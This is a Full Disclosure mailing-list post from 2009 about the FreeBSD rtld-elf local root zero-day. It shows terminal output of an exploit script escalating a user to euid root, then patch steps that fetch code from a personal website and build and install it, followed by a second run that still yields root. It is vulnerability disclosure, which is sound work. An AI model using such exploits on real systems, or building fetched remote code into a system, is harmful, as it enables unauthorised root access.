Full Disclosure mailing list archives
** FreeBSD local r00t zeroday
From: Michał Manterys <michal.manterys () gmail com>
Date: Tue, 1 Dec 2009 20:55:53 +0100
http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071689.html $ uname -a FreeBSD serev1.domena.pl 7.2-STABLE FreeBSD 7.2-STABLE #1: Tue Dec 1 19:42:43 CET 2009 root () server1 domena pl:/usr/src/sys/i386/compile/kern1 i386 $ ./test.sh env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX #id -a uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user) Install patch: cd /usr/src/libexec/rtld-elf fetch http://wojciech.sychut.eu/rtld.patch patch < rtld.patch make clean make make install and: $ ./test.sh env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX #id -a uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- ** FreeBSD local r00t zeroday Michał Manterys (Dec 01)